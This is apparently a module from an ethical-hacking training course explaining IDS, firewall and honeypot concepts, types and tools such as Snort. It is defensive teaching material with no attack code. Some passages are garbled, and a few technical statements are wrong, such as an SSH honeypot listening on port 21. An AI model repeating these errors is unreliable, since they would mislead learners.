Module Objectives
Adoption of Internet use throughout the business world has boosted network usage in general. Organizations are using various network security measures such as firewalls, intrusion detection system (IDS), intrusion prevention system (IPS), and "honeypots" to protect their networks. Networks are the most preferred targets of hackers for compromising organizations' security, and attackers continue to find new ways to breach network security and attack these targets.
This module provides a deep insight into various network security technologies, such as IDS, firewalls, and honeypots. It explains the operations of these components as well as the multiple techniques attackers use to evade them. This module discusses the various tools and techniques used in evading network security and provides countermeasures necessary to prevent such attacks. It also includes an overview of firewall and IDS pen testing an ethical hacker should follow to increase network security.
At the end of this module, you will be able to:
■ Describe IDS, firewall, and honeypot concepts
■ Use different IDS, firewall and honeypot solutions
■ Explain different techniques to bypass IDS
■ Explain various techniques to bypass firewalls
■ Use different IDS/firewall evading tools
■ Explain different techniques to detect honeypots
■ Apply IDS/firewall evasion countermeasures
■ Perform IDS and firewall penetration testing
IDS, Firewall and Honeypot Concepts
The ethical hacker should have an idea about their functions, role, placement, and design implemented to protect an organization's network to understand how an attacker evades the security of firewalls, IDS, and honeypots. This section provides an overview of these basic concepts.
Intrusion Detection System (IDS)
An Intrusion Detection System (IDS) is security software or hardware device used to monitor, detect, and protect networks or system from malicious activities; it alerts the concern security personnel immediately upon detecting intrusions. Intrusion detection systems are highly useful as IDS monitors both inbound/outbound traffic of the network and checks for suspicious activities continuously that may indicate a network or system security breach. The IDS checks traffic for signatures that match known intrusion patterns and signals an alarm when a match is detected. An IDS is used to detect intrusions while an IPS is used to detect and prevent the intrusion on the network.
Main Functions of IDS:
■ An IDS gathers and analyzes information from within a computer or a network, to identify the possible violations of security policy, including unauthorized access, as well as misuse.
■ An IDS is also referred as a "packet-sniffer," which intercepts packets traveling along various communication mediums and protocols, usually TCP/IP.
■ The packets are analyzed after they are captured.
■ An IDS evaluates traffic for suspected intrusions and signals an alarm after detection. Where the IDS resides in the network?
One of the most common places to deploy IDS is near the firewall. Depending on the traffic to be a monitor, IDS is placed outside/inside the firewall to monitor suspicious traffic originating from outside/inside the network. Placed inside, the IDS will be ideal if it is near a DMZ; however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network.
Before deploying the IDS, it is essential to analyze network topology, understand how the traffic flows to and from the resources that an attacker can use to gain access to the network, and identify the critical components that will be a possible target by many of the attacks against the network. Even after deciding the position of the IDS in the network, its configuration would maximize the effectiveness of network protection.
How IDS Works?
The primary purpose of the IDS is to recognize and provide real-time monitoring of intrusions. Additionally, reactive IDSs (and IPs) can intercept, respond, and/or prevent the intrusions.
An IDS works in the following way:
■ IDSs have sensors to detect malicious signatures in data packets, and some advanced IDSs have behavioral activity detection, to determine malicious traffic behavior. Even if the packet signatures do not match perfectly with the signatures in the IDS signature database, the activity detection system can alert administrators about possible attacks.
■ If the signature matches, the IDS performs predefined actions such as terminating the connection, blocking the IP address, dropping the packet, and/or signaling an alarm to notify the administrator.
■ When signature matches, anomaly detection will skip; otherwise, the sensor may analyze traffic patterns for an anomaly.
■ When the packet passes all tests, the IDS will forward it into the network.
The administrator must also be able to identify the methodsand techniques used by the intruder and the source of the attack.
How IDS Detects an Intrusion?
An IDS uses three methods to detect intrusion in the network.
■ Signature Recognition
Signature recognition, also known as misuse detection, tries to identify events that indicate an abuse of a system or network. This technique involves first creating models of possible intrusions and then comparing these models with incoming events to make a detection decision. The signatures for IDS were created on the assumption that the model must detect an attack without disturbing normal system traffic. Only attacks should match the model; otherwise, false alarms could occur.
o Signature-based intrusion detection compares incoming or outgoing network packets
techniques to detect intrusion. Attackers can define a binary signature fora specific portion of the packet, such as TCP flags.
o Signature recognition can detect known attacks. However, there is a possibility that other innocuous packets might also contain the same signature, which will trigger a false positive alert.
signatures required is huge. The more the signatures, the greater the chances are of the IDS detecting attacks, although traffic may incorrectly match with the signatures, thus impeding system performance.increase in the number of signatures in the database could result in the dropping of certain packets.entirely new signatures to detect the similar attack.
o Despite problems with signature-based intrusion detection, such systems are popular and work well when configured correctly and monitored closely.
■ Anomaly Detection
Anomaly detection, or "not-use detection/' differs from the signature-recognition model. Anomaly detection consists of a database of anomalies. An anomaly can be detected when an event occurs outside the tolerance threshold of normal traffic. Therefore, any deviation from regular use is an attack. Anomaly detection detects the intrusion based on the fixed behavioral characteristics of the users and components in a computer system. Creating a model of normal use is the most challenging task in creating an anomaly detector.
o In the traditional method of anomaly detection, essential data are kept for checking variations in network traffic. However, in reality, there is some unpredictability in network traffic, and there are too many statistical variations, thus making these models imprecise. Some events labeled as anomalies might only be irregularities in network usage.
o In this type of approach, the inability to construct a model thoroughly on a regular network is of concern. These models should be used to check on specific networks.
■ Protocol Anomaly Detection
Protocol anomaly detection depends on the anomalies specific to a protocol. It identifies particular flaws between how vendors deploy the TCP/IP protocol. Protocols designs according to RFC specifications, which dictate standard handshakes to permit universal communication. The protocol anomaly detector can identify new attacks.
o There are new attack methods and exploits that violate protocol standards,
o A malicious anomaly signature is growing considerably. However, the network protocol, in comparison, is well defined and changing slowly. Therefore, the signature database should frequently be updated to detect attacks.
o Protocol anomaly detectors are different from the traditional IDS in how they present alarms.
General Indications of Intrusions
Intrusion attempts on networks, system, or file systems can be identified by following some general indicators:
■ File System Intrusions
By observing system files, the presence of an intrusion can be identified. System files record the activities of the system. Any modification or deletion of the file attributes or the file itself is a sign that the system was a target of attack:
o If you find new, unknown files/programs on your system, then there is a possibility that system has intruded. The system can be compromised to the point that it can, in turn, compromise other network systems.
o When an intruder gains access to a system, he or she tries to escalate privileges to gain administrative access. When the intruder obtains Administrator privilege, he/she could change file permissions, for example, from Read-Only to Write.
o Unexplained modifications in file size are also an indication of an attack. Make sure you analyze all of your system files.
o Presence of rogue suid and sgid files on your Linux system that does not match your master list of suid and sgid files could indicate an attack.
o You can identify unfamiliar file names in directories, including executable files with strange extensions and double extensions.
o Missing files are also a sign of a probable intrusion/attack.
o Sudden increase in bandwidth consumption is an indication of intrusion o Repeated probes of the available services on your machines
o Connection requests from IPs other than those in the network range, indicating that an unauthenticated user (intruder) is attempting to connect to the network
o Repeated login attempts from remote hosts
o A sudden influx of log data could indicate attempts at Denial-of-Service attacks, bandwidth consumption, and distributed Denial-of-Service attacks
■ System Intrusions
Similarly, general indications of system intrusions include:
o Sudden changes in logs such as short or incomplete logs
o Unusually slow system performance
o Missing logs or logs with incorrect permissions or ownership
o Modifications to system software and configuration files
o Unusual graphic displays or text messages
o Gaps in system accounting
o System crashes or reboots
o Unfamiliar processes
Types of Intrusion Detection Systems
There are two types of intrusion detection systems:
■ Network-Based Intrusion Detection Systems
Network-based intrusion detection systems (NIDSs) check every packet entering the network for the presence of anomalies and incorrect data. By limiting the firewall to drop large numbers of data packets, the NIDS checks every packet thoroughly. A NIDS captures and inspects all traffic. It generates alerts either at the IP or the application-level based on the content. NIDSs are more distributed than host-based IDSs. The NIDS identifies the anomalies at the router and host level. It audits the information contained in the data packets, logging information of malicious packets, and assigns a threat level to each risk after receiving the data packets. The threat level enables the security team to be on alert. These mechanisms typically consist of a black box placed on the network in promiscuous mode, listening for patterns indicative of an intrusion. It detects malicious activity such as Denial-of-Service attacks, port scans, or even attempts to crack into computers by monitoring network traffic.
■ Host-Based Intrusion Detection Systems
In the host-based system, the IDS analyze each system's behavior. Install Host-Based Intrusion Detection Systems (HIDSs) on any system ranging from a desktop PC to a server. The HIDS is more versatile than the NIDS. In addition to detecting unauthorized insider activity, host-based systems are also effective at detecting unauthorized file modification. HIDSs focuses on the changing aspects of local systems. The HIDS is also more platform centric, with more focus on the Windows OS, but there are other HIDSs for UNIX platforms. These mechanisms usually include auditing events that occur on a specific host.
These are not as common, because of the overhead they incur by having to monitor each system event.
Organization networks also use two other IDS systems. Log File Monitoring
A log file monitor (LFM) monitors log files created by network services. The LFM IDS searches through the logs and identifies malicious events. In a similar manner to NIDS, these systems look for patterns in the log files that suggest an intrusion. A typical example would be parsers for HTTP server log files that look for intruders who try well-known security holes, such as the "phf" attack. LFM tools, like "Swatch," for example, are typically programs that parse log files after an event has already occurred, such as failed login attempts.
File Integrity Checking
These mechanisms check for Trojan horses, or modified files, indicating the presence of an intruder. Tripwire is an example of a file integrity checking tool.
Types of IDS Alerts
An IDS generates four types of alerts which include: True Positive, False Positive, False Negative and True Negative.
■ True Positive (Attack - Alert): A true positive is a condition occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. The event may be an actual attack, in which case an attacker is making an attempt to compromise the network, or it may be a drill, in which case security personnel are using hacker tools to conduct tests of a network segment.
■ False Positive (No attack - Alert): A false positive occurs if an event triggers an alarm when no actual attack is in progress. A false positive occurs when an IDS treats regular system activity as an attack. False positives tend to make users insensitive to alarms and reduce their reactions to actual intrusion events. While testing the configuration of an IDS, administrators use false positives to determine if the IDS can distinguish between false positives and real attacks or not.
■ False Negative (Attack - No Alert): A false negative is a condition occurred when an IDS fails to react to an actual attack event. This event is the most dangerous failure since the purpose of an IDS is to detect and respond to attacks.
■ True Negative (No attack-No Alert): A true negative is a condition occurred when an IDS identifies an activity as acceptable behavior and the activity is acceptable. A true negative is successfully ignoring the acceptable behavior. It is not harmful as the IDS is performing as expected.
Firewall
A firewall is software- or hardware-based system located at the network gateway that protects the resources of a private network from unauthorized access of users on other networks. They are placed at the junction or gateway between the two networks, which is usually a private network and a public network such as the Internet. Firewalls examine all messages entering or leaving the Intranet and blocks those that do not meet the specified security criteria. Firewalls may be concerned with the type of traffic or with the source or destination addresses and ports. They include a set of tools that monitor the flow of traffic between networks. A firewall placed at the network level and working closely with a router filters all network packets to determine whether to forward them toward their destinations or not. Always install firewalls away from the rest of the network, so that none of the incoming request can get direct access to a private network resource. If appropriately configured, the firewall protects systems on one side of it from systems on the other side of the firewall.
■ A firewall is an intrusion detection mechanism that is designed by each organization's security policy. Its settings can change to make appropriate changes to its functionality.
■ Firewalls can configure to restrict incoming traffic to POP and SMTP and to enable email access. Certain firewalls block specific email services to secure against spam.
■ A firewall can configure to check inbound traffic at a "checkpoint," where a security audit is performed. It can also act as an active "phone tap" tool for identifying an intruder's attempt to dial into modems in a secured network. Firewall logs consist of logging information that reports to the administrator all attempts to access various services.
■ The firewall verifies the incoming and outgoing traffic against firewall rules and acts as a router to move data between networks. Firewalls allow or deny access requests made from one side of the firewall to services on the other side of the firewall.
■ Identify all the attempts to log into the network for auditing. Unauthorized attempts can identified by embedding an alarm that is triggered when an unauthorized attempts to log in. Firewalls can filter packets based on address and types of traffic. They recognize the source, destination addresses, and port numbers when address filtering, and they identify types of network traffic when protocol filtering. Firewalls can identify the state and attributes of data packets.
Firewall Architecture
Firewall architecture consists of the following elements:
■ Bastion Host
The bastion host designed for defending the network against attacks. It acts as a mediator between inside and outside networks. A bastion host is a computer system designed and configured to protect network resources from attack. Traffic entering or leaving the network passes through the firewall, it has two interfaces:
o Public interface directly connected to the Internet o Private interface connected to the Intranet
■ Screened Subnet
A screened subnet (DMZ) is a protected network created with a two- or three-homed firewall behind a screening firewall and is a name commonly used to refer to the DMZ. When using a three-homed firewall, connect the first interface to the Internet, the second interface to the DMZ, and the third to the intranet. The DMZ responds to public requests and has no hosts accessed by the private network. Internet users can not access the private zone.
The advantage of screening a subnet away from the intranet is that public requests can be responded to without allowing traffic into the intranet. A disadvantage with the three- homed firewall is that if it compromised, both the DMZ and intranet could also be compromised. A safer technique is to use multiple firewalls to separate the Internet from the DMZ, and then to separate the DMZ from the intranet.
■ Multi-homed Firewall
A multi-homed firewall is a node with multiple NICs that connects to two or more networks. It connects each interface to the separate network segments logically and physically. A multi-homed firewall helps in increasing efficiency and reliability of an IP network. In the multi-homed firewall, more than three interfaces are present that allow for further subdividing the systems based on the specific security objectives of the organization. However, the model that adds depth of protection is the back-to-back firewall.
DeMilitarized Zone (DMZ)
In computer networks, the DeMilitarized Zone (DMZ) is an area that hosts computer(s) or a small sub-network placed as a neutral zone between a particular company's internal network and untrusted external network to prevent outsider access to a company's private data. The DMZ serves as a buffer between the secure internal network and the insecure Internet, as it adds a layer of security to the corporate LAN, thus preventing direct access to other parts of the network.
A DMZ is created using a firewall with three or more network interfaces assigned specific roles, such as an internal trusted network, a DMZ network, or an external untrusted network (Internet). Any service such as mail, web, and FTP that provide access to external users can be placed in the DMZ. Although web servers that communicate with database servers cannot reside in the DMZ— as doing so could give outside users direct access to sensitive information. There are many ways in which the DMZ can be configured, according to specific network topologies and company requirements.
Types of Firewalls
There are two types of firewalls.
■ Hardware Firewall
A hardware firewall is a dedicated firewall device placed on the perimeter of the network. It is an integral part of network setup and is also built into Broadband routers or as a standalone product. A hardware firewall helps to protect systems on the local network, and they are effective with little to no configuration. It employs a technique of packet filtering. It reads the header of a packet to find out the source and destination address and compares it with a set of predefined and/or user-created rules that determine whether if it should forward or drop the packet. A hardware firewall functions on an individual system or a particular network connected using a single interface. Examples of a hardware firewall are Cisco ASA, Fortigate, etc. Hardware firewalls protect the private local area network.implement and upgrade. Advantages:
o Security: A hardware firewall with its operating system (OS) is considered to reduce the security risks and has increased the level of security controls.
o Speed: Hardware firewalls initiate faster responses and enable more traffic.
o Minimal Interference: Since a hardware firewall is a separate network component
Disadvantages:
o More expensive than a software firewall. o Hard to implement and configure.
o Consumes more space and involves cabling. ■ Software Firewall
A software firewall is similar to a filter. It sits between the regular application and the networking components of the OS. It is more helpful for individual home users, is suitable for mobile users who need digital security working outside of the corporate network and it is easy to install on an individual's PC, notebook, or workgroup server. It helps protect your system from outside attempts of unauthorized access and protects against everyday Trojans and email worms. It includes privacy controls and web filtering and more. A software firewall implants itself in the critical area of the application/network path. It analyzes data flow against the rule set.
The configuration of a software firewall is simple compared to the hardware firewall. It intercepts all requests from a network to the computer to determine if they are valid and protects the computer from illicit attacks that try to access it. It incorporates user-defined resources, than hardware firewalls and this reduces the speed of system. Examples of software firewalls are produced by Norton, McAfee, and Kaspersky among others.
Advantages:
o Less expensive than hardware firewalls, o Ideal for personal or home use.
o Easier to configure and reconfigure. Disadvantages:
o Consumes system resources. o Difficult to un-install firewalls.
o Not appropriate for environments requiring faster response times.
Firewall Technologies
Firewalls are designed and developed with the help of different firewall services. Each firewall service provides security depending on their efficiency and sophistication. There are different types of firewall technologies, depending on where the communication is taking place, where traffic is intercepted in the network, the state that it traces, and so on. Taking into account the capabilities of the different firewalls offered, it is easy to choose and place an appropriate firewall to meet security requirements in the best possible way. Each type of firewall has its advantages. Several firewall technologies are available for organizations to implement their security. Sometimes, firewall technologies are combined with other technologies to build another firewall technology. For example, NAT is a routing technology, but when combined with a firewall, it is considered a firewall technology instead.
Listed below are various firewall technologies:
■ Packet Filtering
■ Circuit Level Gateways
■ Application Level Firewall ■ Stateful Multilayer Inspection ■ Application Proxies
■ Virtual Private Network
■ Network Address Translation
The security level of these technologies varies according to the efficiency level of each technology. A comparison of these technologies can be concluded by allowing these technologies to pass through the OSI layer between the hosts. The data passes through the intermediate layers from a higher layer to a lower layer. Each layer adds additional information to the data packets. The lower layer now sends the obtained information through the physical network to the upper layers and after that to its destination.
Packet Filtering Firewall
In a packet filtering firewall, each packet is compared to a set of criteria before it is forwarded. Depending on the packet and the criteria, the firewall can drop the packet and transmit it, or send a message to the originator. Rules can include the source and the destination IP address, the source and the destination port number, and the protocol used. It works at the Internet Protocol (IP) layer of the TCP/IP model or network layer of the OSI model. Packet filter-based firewalls concentrate on individual packets, analyze their header information, and determine which way they need to direct. Traditional packet filters make this decision according to the following information in a packet:
■ Source IP address: Used to check if the packet is coming from a valid source or not. The information about the source IP address can found from the IP header of the packet, which indicates the source system address.
■ Destination IP address: Checks if the packet is going to the correct destination and check if the destination accepts these types of packets. The information about the destination IPaddress can found from the IP header of the packet, which has the destination address.
■ Source TCP/UDP port: This is used to check the source port of the packet
■ Destination TCP/UDP port: This is used to monitor the destination port, regarding the services to be allowed and the services to be denied.
■ TCP flag bits: Used to check whether the packet has an SYN, ACK, or other bits set for the connection to be made.
■ Protocol in use: Used to check whether the protocol that the packet is carrying should be allowed.
■ Direction: Used to check whether the packet is entering or leaving the private network. ■ Interface: Used to check whether or not the packet is coming from an unreliable zone.
Circuit-Level Gateway Firewall
A circuit-level gateway firewall works at the session layer oftheOSI model or TCP layer of TCP/IP. It forwards data between networks without verifying it, and blocks incoming packets into the host, but allows the traffic to pass through itself. Information passed to remote computers through a circuit-level gateway will appear to have originated from the gateway, as the incoming traffic carries the IP address of the proxy (circuit-level gateway). They monitor requests to create sessions and determine if those sessions will be allowed.
A circuit-level gateway gives controlled access to network services and host requests. For detecting whether or not a requested session is valid, it checks TCP handshaking between packets Circuit proxy firewalls allow or prevent data streams; they do not filter individual packets. They are relatively inexpensive and hide the information about the private network that they protect.
Application-Level Firewall
Application-based proxy firewalls concentrate on the Application layer rather than just the packets. Application-level gateways (proxies) can filter packets at the application layer of the OSI model (or the application layer of TCP/IP). Incoming and outgoing traffic is restricted to services supported by proxy; all other service requests are denied. The need for use of application-level firewall arises as tremendous amount of voice, video, and collaborative traffic accessed at data- link layer and network layer utilized for unauthorized access to internal and external networks. Application-level gateways configured as a web proxy prohibit FTP, gopher, telnet, or other traffic. Application-level gateways examine traffic and filter on application-specific commands such as HTTP: post and get.
Traditional firewalls are unable to filter such types of traffic. They can inspect, find, and verify malicious traffic that is missed by stateful inspection firewalls to make decisions about whether to allow it access and improves the overall security of the application layer. For example, worms that send malicious code in legitimate protocols cannot be detected by stateful firewalls, as proxy firewalls concentrate on packet headers at the network layer. However, deep packet inspection firewalls can find such attacks with the help of informative signatures added inside packets. Some of the features of application-level firewalls:
■ They analyze the application information to make decisions about whether to permit traffic.
■ Being proxy-based, they can permit or deny traffic according to the authenticity of the user or process involved.
■ A content-caching proxy optimizes performance by caching frequently accessed information rather than sending new requests to the servers for the same old data.
Application-layer firewalls can function in one of two modes: active or passive.
■ Active application-level firewalls: They examine all incoming requests, including the actual message that exchanged against known vulnerabilities, such as SQL injection, parameter and cookie tampering, and cross-site scripting. The requests deemed genuine are allowed to pass through them.
■ Passive application-level firewalls: They work similarly to an IDS, in that they also check all incoming requests against known vulnerabilities, but they do not actively reject or deny those requests if a potential attack is discovered.
Stateful Multilayer Inspection Firewall
Stateful multilayer inspection firewalls combine the aspects of the other three types of firewalls (Packet Filtering, Circuit Level Gateways, and Application Level Firewall). They filter packets at the network layer of the OSI model (or the IP layer of TCP/IP), to determine whether session packets are legitimate, and they evaluate the contents of packets at the application layer.
With the use of stateful packet filtering, you can overcome the limitation of packet firewalls that can only filter on IP address, port, and protocol, and so on. This multilayer firewall can perform deep packet inspection.
Features of the Stateful Multilayer Inspection Firewall:
■ This type of firewall can remember the packets that passed through it earlier and make decisions about future packets based on the stated in the conversation.
■ These firewalls provide the best of both packet filtering and application-based filtering. ■ Cisco PIX firewalls are stateful.
■ These firewalls track and log slots or translations.
Application Proxy
An application-level proxy works as a proxy server and filters connections for specific services. It filters connections based on the services and protocols when acting as proxies. For example, A FTP proxy will only allow FTP traffic to pass through, while all other services and protocols will be blocked. It is a type of server that acts as an interface between the user workstation and the Internet. It correlates with the gateway server and separates the enterprise network from the Internet. It receives the request from a user to provide the internet service and responds to the original request only. A proxy service is an application or program that helps forward user requests (for example, FTP or Telnet) to the actual services. The proxies are also known an application level gateway, as they renew the connections and act as a gateway to the services. Proxies run on a firewall host that is either a dual-homed host or some other bastion host for security purposes. Some proxies named caching proxies, run for network efficiency. They keep copies of the requested data of the hosts they proxy. Such proxies can provide the data directly when multiple hosts request the same data. Caching proxies helps in reducing the load on network connections whereas proxy servers provide both security and caching.
A proxy service is available to the user in the internal network, the service on the outside network (Internet) and is transparent. Instead of direct communication between each, they talk with the proxy, and it handles all the communication between users and the internet services. Transparency is the advantage of proxy services. To the user, a proxy server presents the illusion that they are dealing directly with the real server whereas, with the real server, the proxy server gives the illusion that it is dealing directly with the user.
Advantages
■ Proxy services can be good at logging because they can understand application protocols and effectively allow logging.
■ Proxy services reduce the load on network links as they are capable of caching copies of frequently requested data and allow it to be directly loaded from the system instead of the network.
■ Proxy systems perform user-level authentication, as they are involved in the connection.
■ Proxy systems automatically protect weak or faulty IP implementations as it sits between the client and the internet and generates new IP packets for the client.
Disadvantages
■ Proxy services lag behind non-proxy services until the suitable proxy software is available. ■ Each service in a proxy may use different servers.
■ Proxy services may require changes in the client, applications, and procedures.
Network Address Translation (NAT)
Network address translation (NAT) separates IP addresses into two sets and enabling the LAN to use these addresses for internal and external traffic, respectively. The NAT helps hide an internal network layout and force connections to go through a choke point. It also works with a router, the same as packet filtering does, NAT will also modify the packets the router sends at the same time. When the internal machine forwards the packet to the outside machine, NAT modifies the source address of the particular packet to make it appear as if it is coming from a valid address. When the external machine sends the packet to the internal machine the NAT modifies the destination address to turn the visible address into the correct internal address. The NAT can also change the source and destination port numbers. It limits the number of public IP addresses an organization can use. It can act as a firewall filtering technique where it allows only those connections which originate on the inside network and will block the connections which originate on the outside network. NAT systems use different schemes for translating between internal and external addresses:
■ Assigning one external host address for each internal address and always applying the same translation. This slows down connections and does not provide any savings in address space.
■ Dynamically allocate an external host address without modifying the port numbers at the time when the internal host initiates a connection. This restricts the number of internal hosts that can simultaneously access the Internet to the number of available external addresses.
■ Create a fixed mapping from internal addresses to externally visible addresses, but use a port mapping so that multiple internal machines use the same external addresses.
■ Dynamically allocate an external host address and port pair each time an internal host initiates a connection. This makes the most efficient possible use of the external host addresses.
Advantages
■ Network address translation helps to enforce the firewall's control over outbound connections.
■ It restricts incoming traffic and allows only packets that are part of a current interaction initiated from the inside.
■ Helps hide the internal network's configuration and thereby reduces the success of attacks on the network or system.
Disadvantages
■ The NAT system has to guess how long it should keep a particular translation, which is impossible to guess correctly every time.
■ The NAT interferes with encryption and authentication systems to ensure the security of the data.
■ Dynamic allocation of ports may interfere with packet filtering.
Virtual Private Network
A Virtual Private Network (VPN) is a network that provides secure access to the private network through the internet. VPNs are used for connecting wide area networks (WAN). It allows computers on one network to connect to computers on another network. It is used for the secure transmission of sensitive information over an untrusted network, using encapsulation and encryption. It employs encryption and integrity protection helping you to use a public network as a private network. A VPN performs encryption and the decryption outside the packet-filtering perimeter to allow the inspection of packets coming from other sites. It establishes a virtual point-to-point connection through the use of dedicated connections. A VPN encapsulates packets sent over the Internet. A VPN is an attempt to combine both the advantages of public and private networks. VPNs have no relation to firewall technology, but firewalls are convenient for adding VPN features as they help in providing secure remote services. The computing device running the VPN software can only access the VPN.
All virtual private networks that run over the Internet employ these principles:
■ Encrypts the traffic
■ Checks for integrity protection
■ Encapsulates into new packets, which are sent across the Internet to something that reverses the encapsulation
■ Checks the integrity
■ Then finally, decrypts the traffic
■ A VPN hides all the traffic that flows over it, ensures encryption, and protects the data from snooping.
■ It provides remote access for protocols without letting people attack from the Internet at large.
Disadvantages
■ As the VPN runs on a public network, the user will be vulnerable to an attack on the destination network.
Firewall Limitations
The need of a firewall In your security strategy is essential, but firewalls have the following limitations:
■ Firewalls can restrict users from accessing valuable services like FTP, Telnet, NIS, etc. and sometimes restricts Internet access as well.
■ The firewall cannot protect from internal attacks (backdoor) in a network. For example, a disgruntled employee who cooperates with the external attacker.
■ The firewall concentrates its security at one single point which makes other systems within the network prone to security attacks.
■ A bottleneck could occur if all the connections pass through the firewall.
■ The firewall cannot protect the network from social engineering and data-driven attacks where the attacker sends malicious links and emails to employees inside the network.
■ If external devices such as a laptop, mobile phone, portable hard drive, etc. are already infected and connected to the network, then a firewall cannot protect the network from these devices.
■ The firewall is unable to adequately protect the network from all types of zero-day viruses that try to bypass it.
■ A firewall cannot do anything if the network design and configuration is faulty. ■ A firewall is not an alternative to antivirus or antimalware.
■ A firewall does not block attacks from a higher level of the protocol stack.
■ A firewall does not protect against attacks originating from common ports and applications.
■ A firewall does not protect against attacks from dial-in connections.
■ A firewall is unable to understand tunneled traffic.
Honeypot
A honeypot is a computer system on the Internet intended to attract and trap people who try unauthorized or illicit utilization of the host system to penetrate into an organization's network. It is a fake proxy run in an attempt to frame attackers by logging traffic through it, and then sending complaints to victims' ISPs. It has no authorized activity, does not have any production value, and any traffic to it is likely a probe, attack, or compromise. Whenever there is any interaction with a honeypot, it is most likely to be a malicious activity. Honeypots are unique; they do not solve a specific problem. Instead, they are a highly flexible tool with many different security applications. Honeypots help in preventing attacks, detecting attacks, and for information gathering and research. A honeypot can log port access attempts, or monitor an attacker's keystrokes. These could be early warnings of a more concerted attack. It requires considerable amount of attention to maintain a honeypot.
Types of Honeypots
Honeypots are classified into five types based on their design criteria:
■ Low-interaction Honeypots
Low-interaction honeypot emulates only limited number of services and applications of a target system or network. If the attacker does something that the emulation does not expect, the honeypot will simply generate an error. They capture limited amounts of information, mainly transactional data, and some limited interaction. These honeypots cannot be compromised completely. They are set to collect higher level information about attack vectors such as network probes and worm activities. Some examples are Specter, KFSensor, and Honeytrap.
KFSensor is a low-interaction honeypot, used to attract and identify penetrations. They implement vulnerable system services and Trojans to attract hackers. This honeypot can be used to monitor all TCP, UDP, and ICMP ports and services. KFSensor identifies and alerts about port scanning and denial-of-service attacks.
Honeytrap is low-interaction honeypot used to observe attacks against TCP and UDP services. It runs as a daemon and starts server processes dynamically on requested ports. Attackers are tricked, and they send responses to honeytrap server process. The data that is received by the honeypot is concatenated into a string and stored in a database file. This string is called attack string. Honeytraps parse attack strings for a command requesting the server to download a file from another host in the network. If such a command is detected, the server tries to access the corresponding file automatically. It supports only FTP and TFTP protocols. It also identifies and logs HTTP_URIs.
■ Medium-interaction Honeypots
Medium-interaction honeypots simulate a real OS, applications and its services of a target network. They provide more misconception of an OS than low-interaction honeypots. Therefore, it is possible to log and analyze attacks that are more complex. These honeypots capture more and useful data than the low-interaction honeypot. Medium interaction honeypots can only respond to preconfigured commands, therefore, the risk of intrusion increases. The main disadvantage of medium-interaction honeypot is that the attacker can quickly discover that the system behavior is abnormal. Some examples of medium-interaction honeypot include HoneyPy, Kojoney2, and Cowrie.
Kojoney2 is medium interaction honeypot. It emulates a real SSH environment. This honeypot listens on port 21 for incoming SSH connections. If a connection request is initiated, Kojoney2 will verify users against an internal list of fake users. Mostly, the connections are accepted by granting access to SSH shell. It simulates many shell commands to trick attackers. Using Kojoney2 attackers can download files using wget and curl commands.
■ High-Interaction Honeypots
Unlike their low and medium interaction counterparts, high-interaction honeypots do not emulate anything; they run actual vulnerable services or software on production systems with real OSs and applications. These honeypots simulate all services and applications. It can be completely compromised by attackers to get full access to the system in a controlled area. They capture complete information about an attack vector such as attack techniques, tools, and intent of the attack. The honeypotized system is more prone to infection, as attack attempts can be carried out on real production systems.
A honeynet is a prime example of a high-interaction honeypot and is neither a product nor a software solution that a user installs. Instead, it is an architecture—an entire network of computers designed to attack. The idea is to have an architecture that creates a highly controlled network with real computers running real applications, in which all activities are monitored and logged.
"Bad guys" find, attack, and break into these systems on their initiative. When they do, they do not realize they are in a honeynet. Without the knowledge of the attackers, all their activities and actions, from encrypted SSH sessions to email and file uploads, is captured by inserting kernel modules on the victim's systems.
At the same time, the honeynet controls the attacker's activity. Honeynets do this by using a honeywall gateway, which allows inbound traffic to the victim's systems but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim's systems, but prevents the attacker from harming other non-honeynet computers.
■ Production Honeypots
Production honeypots emulate real production network of an organization. They make the attackers spend their time and resources to attack the critical production system of the company. Attackers uncover and discover the vulnerabilities and trigger alerts that help network administrators to provide early warnings of attacks and hence reduce the risk of an intrusion.
This type of honeypots can also emulate different trojans, viruses, and backdoors to attract the attackers. For example, to examine the attacks on intrusion detection system, a production honeypot emulating IDS with fake services is deployed. As production honeypot is deployed internally, it also helps to find out internal flaws and attackers within an organization.
■ Research Honeypots
Research honeypots are high interaction honeypots primarily deployed in research institutes, government or military organizations to get a detailed knowledge about the actions of intruders. By using this type of honeypots security analysts can obtain in-depth information about the way an attack is performed, vulnerabilities exploited and the attack techniques and methods used by the attackers. This analysis, in turn, can help an organization to improve attack prevention, detection, and security mechanisms and develop more secure network infrastructure.
The drawback of research honeypots is that it does not contribute to the direct security of the company. However, if a company is looking to improve their production infrastructure they should opt for production honeypots.
IDS, Firewall and Honeypot Solutions
The previous section discussed the functioning, role, and placement of IDS, firewalls, and honeypots for securing the networks. There is number of easy to use and feature enriched solutions (hardware, software, or both) available for IDS, firewalls, and honeypots implementation. This section will discuss some of the IDS, firewalls, and honeypots solutions available in the market that simplify their usage.
Intrusion Detection Tools
Intrusion detection tools detect anomalies. These tools, when running on a dedicated workstation, read all network packets, reconstruct user sessions, and scan for possible intrusions by looking for attack signatures and network traffic statistical anomalies. Also, these tools give real-time, zero-day protection from network attacks and malicious traffic, and prevent malware, spyware, port scans, viruses, and DoS and DDoS from compromising hosts.
■ Snort
Source: https://www.snort.org
Snort is an open source network intrusion detection system, capable of performing real time traffic analysis and packet logging on IP networks. It can perform protocol analysis and content searching/matching and is used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts. It uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that utilizes a modular plug-in architecture. Uses of Snort:
o Straight packet sniffer like tcpdump
o Packet logger (useful for network traffic debugging, etc.) o Network intrusion prevention system
Snort Rules
Snort's rule engine enables custom rules to meet the needs of the network. Snort rules help in differentiating between normal Internet activities and malicious activities. Snort uses the popular libpcap library (for UNIX/Linux) or Winpcap (for Windows), the same library that tcpdump uses to perform its packet sniffing. Attaching snort in promiscuous mode to the network media decodes all the packets passing through the network. It generates alerts according to the content of individual packets and rules defined in the configuration file.
Snort allows users to write their own rules. However, each of these Snort rules must describe the following:
■ Any violation of the security policy of the company that might be a threat to the security of the company's network and other valuable information
■ All well-known and frequent attempts to exploit the vulnerabilities in the company's network
■ The conditions in which a user thinks that a network packet(s) is unusual (i.e., if the identity of the packet is not authentic)
